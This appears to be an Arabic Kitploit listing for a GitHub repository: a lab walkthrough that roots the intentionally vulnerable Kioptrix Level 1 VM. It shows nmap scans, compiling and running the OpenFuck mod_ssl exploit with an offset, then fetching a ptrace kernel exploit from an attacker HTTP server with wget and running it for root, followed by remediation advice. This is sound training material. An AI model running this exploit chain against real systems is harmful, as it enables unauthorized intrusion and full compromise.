Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Binary-Exploitation-and-Kernel-Escalation — تم تأمين الوصول على مستوى الجذر عن طريق تحديد واستغلال التكوينات الخاطئة والبرامج القديمة. ثغرة تجاوز سعة المخزن المؤقت في إصدار قديم من mod_ssl (CVE-2002-0082). تم تحقيق تصعيد الامتيازات لاحقًا عن طريق استغلال حالة سباق في أداة "ptrace" لنواة Linux (CVE-2003-0127)، | Kitploit
أدوات/GitHubGitHub/anilkashyap01/binary-exploitation-and-kernel-escalation
تصعيد الامتيازاتالاستطلاعمسح المنافذتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائية

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
مختبرات وتدريب عملي
GitHubanilkashyap01/binary-exploitation-and-kernel-escalation

Binary-Exploitation-and-Kernel-Escalation

تم تأمين الوصول على مستوى الجذر عن طريق تحديد واستغلال التكوينات الخاطئة والبرامج القديمة. ثغرة تجاوز سعة المخزن المؤقت في إصدار قديم من mod_ssl (CVE-2002-0082). تم تحقيق تصعيد الامتيازات لاحقًا عن طريق استغلال حالة سباق في أداة "ptrace" لنواة Linux (CVE-2003-0127)،

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

استغلال الثنائيات وتصعيد صلاحيات النواة

تم تأمين الوصول على مستوى الجذر عن طريق تحديد واستغلال سوء التهيئة والبرامج القديمة. ثغرة تجاوز سعة المخزن المؤقت في إصدار قديم من mod_ssl (CVE-2002-0082). تم تحقيق تصعيد الصلاحيات لاحقًا من خلال استغلال حالة سباق في أداة "ptrace" لنواة لينكس (CVE-2003-0127)، المرحلة 1: الاستطلاع والتعداد كانت الخطوة الأولى هي تحديد عنوان IP للهدف على الشبكة الفرعية 192.168.56.0/24.

اكتشاف المضيف:

root@kitploit:~
sudo nmap -sn 192.168.56.0/24

النتيجة: تم تحديد الهدف على 192.168.56.105.

مسح المنافذ وتعداد الخدمات: تم إجراء مسح شامل باستخدام Nmap لتحديد المنافذ المفتوحة والخدمات الجارية وتفاصيل نظام التشغيل.

root@kitploit:~
sudo nmap -sS -sV -O -p- -oA lab_full_scan1 192.168.56.105

النتائج الرئيسية:

root@kitploit:~
المنفذ 80/tcp و 443/tcp: يعمل Apache httpd 1.3.20 مع mod_ssl/2.8.4 و OpenSSL/0.9.6b.

المنفذ 22/tcp: يعمل OpenSSH 2.9p2.

المنفذ 139/tcp: يعمل Samba smbd.

كشف نظام التشغيل: نواة لينكس 2.4.X (من المحتمل 2.4.9 - 2.4.18).

الإصدار القديم من Apache و mod_ssl قدم فورًا ناقلًا عالي الاحتمال للوصول الأولي. المرحلة 2: الوصول الأولي (الاستغلال)

أكدت قاعدة بيانات الاستغلال عبر searchsploit أن mod_ssl 2.8.4 عرضة لثغرة تجاوز سعة المخزن المؤقت عن بُعد معروفة.

root@kitploit:~
searchsploit mod_ssl 2.8

لقد حددت استغلال OpenFuckV2.c (EDB-ID: 47080) كأكثر حمولة موثوقة لهذه الثغرة. لقد قمت بنسخ الاستغلال إلى المضيف المحلي وقمت بتجميعه مع مكتبات التشفير اللازمة.

تجميع الاستغلال:

root@kitploit:~
searchsploit -m 47080
gcc -o OpenFuck 47080.c -lcrypto

تشغيل الثنائي المُجمّع بدون وسائط قدم قائمة بالإزاحات المدعومة. من خلال مطابقة الإزاحة مع نظام التشغيل الخاص بالهدف وإصدار Apache (Red-Hat Linux, Apache 1.3.20)، حددت أن الإزاحة الصحيحة هي 0x6b.

التنفيذ:

root@kitploit:~
./OpenFuck 0x6b 192.168.56.105 443 -c 40

نجح الاستغلال في إجبار تجاوز سعة المخزن المؤقت، مما منح شلًا بصلاحيات منخفضة كمستخدم apache.

root@kitploit:~
bash-2.05$ whoami
apache

المرحلة 3: تصعيد الصلاحيات

ملاحظة حول المنهجية: يحاول استغلال OpenFuck تنزيل حمولة تصعيد صلاحيات ثانوية (ptrace-kmod.c) تلقائيًا من خادم بعيد باستخدام wget. ومع ذلك، نظرًا لعدم اتصال البيئة المستهدفة بالإنترنت الصادر، فشلت هذه الخطوة التلقائية (حل إلى Host not found). انتقلت إلى التعداد والاستغلال اليدوي.

تعداد النظام:

root@kitploit:~
bash-2.05$ uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

كان النظام يعمل بنسخة نواة شديدة الضعف: 2.4.7-10. البحث عن استغلالات تستهدف نواة لينكس هذه كشف عن ثغرة تصعيد صلاحيات محلية تستخدم ptrace/kmod.

إعداد الحمولة: لقد حددت الاستغلال محليًا (EDB-ID: 3) واستضفته عبر خادم HTTP بايثون على جهاز المهاجم لتسهيل النقل.

المضيف المهاجم:

root@kitploit:~
searchsploit -m 3
python3 -m http.server 8000

الجهاز المستهدف:

root@kitploit:~
cd /tmp
wget http://192.168.56.1:8000/3.c

تم نقل الكود المصدري 3.c بنجاح إلى دليل /tmp للهدف، وقمت بتجميعه وتنفيذه محليًا على الجهاز المستهدف.

التنفيذ واختراق الجذر:

root@kitploit:~
gcc 3.c -o exploit

./exploit

whoami

root

id 

**uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)**

تم استغلال حالة سباق ptrace بنجاح، مما أدى إلى تصعيد الصلاحيات من خادم apache إلى الجذر. تم تحقيق اختراق كامل للنظام.

المرحلة 4: المعالجة لتأمين هذا النظام ضد الثغرات التي تم استغلالها:

  1. تحديث خدمات الويب: يجب تحديث خادم Apache إلى أحدث الإصدارات المستقرة لسد ثغرة تجاوز سعة المخزن المؤقت CVE-2002-0082، التي تسمح بتنفيذ تعليمات برمجية عن بُعد بدون مصادقة.

  2. تصحيح النواة: نواة لينكس (2.4.7-10) عرضة لعدة استغلالات محلية لتصعيد الصلاحيات، بما في ذلك حالة سباق ptrace (kmod). يجب ترقية نواة نظام التشغيل إلى إصدار حديث مدعوم.

  3. تجزئة الشبكة وتصفية الصادر: يجب وضع الخادم خلف جدار حماية يقيد حركة المرور الصادرة غير الضرورية. بينما فشل wget التلقائي في هذا المختبر غير المتصل، فإن تصفية الصادر ستمنع تطبيقات الويب المخترقة من سحب حمولات ضارة ثانوية من الإنترنت في بيئة حية.

تنزيل الأداة